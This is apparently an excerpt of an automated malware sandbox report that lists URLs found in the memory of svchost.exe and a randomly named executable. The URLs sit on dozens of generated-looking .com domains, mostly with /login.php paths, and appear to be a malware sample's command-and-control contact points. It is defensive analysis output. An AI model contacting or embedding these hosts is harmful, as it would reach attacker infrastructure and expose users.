Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujymiq.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930409487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujytug.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybal.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumycav.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumycug.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumydyg.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumygyp.com/
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumygyp.com/H
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumygyp.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjip.com/login.php
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjip.com/login.php?
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyliq.com/
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumypog.com/http://lysynur.com/http://lysynur.com/http://volykyc.com/http://lysynur.com/http:
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086E7000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2076688408.0000000009441000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pumypog.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432764888.0000000008B0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433688306.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432912644.0000000008B12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432910805.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytup.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytyq.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywaq.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128124407.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywov.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.0000000009333000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086E7000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086FA000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1932747230.0000000000DB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupybul.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupybyg.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycag.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycop.com/login.php
Source: svchost.exe, 00000002.00000003.1433180405.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1448284341.0000000008A7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433099437.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1828997616.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433689481.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710718578.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761273136.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664583329.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929371959.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724324245.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139975711.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydeq.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydev.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741281252.00000000008A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupygel.com/login.php
Source: svchost.exe, 00000002.00000003.1930409487.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyjap.com/http://pupyjap.com/http://lykytin.com/http://lykytin.com/http://lykytin.com/http:
Source: svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupylug.com/p
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576652644.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupymol.com/login.php
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupypep.com/
Source: svchost.exe, 00000002.00000003.1487581864.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710622766.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711822225.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486308101.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711574837.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupypiv.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyteg.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupywog.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxup.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxuq.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1545234021.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542434991.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purybav.com/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purydyv.com/http://qetyvep.com/
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000933F000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008403000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://purydyv.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purygeg.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purygiv.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710622766.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711822225.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486668430.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711574837.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489527463.0000000008B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylev.com/login.php
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylup.com/
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809959193.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549695990.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylup.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purypig.com/login.php
Source: svchost.exe, 00000002.00000003.1433180405.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432764888.0000000008B0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433099437.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433689481.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433688306.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432912644.0000000008B12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432691608.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432910805.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purypol.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyg.com/login.php
Source: svchost.exe, 00000002.00000003.2481161521.0000000008A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623273895.0000000008A15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483228275.0000000008ACE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139975711.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623816509.0000000008A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywoq.com/
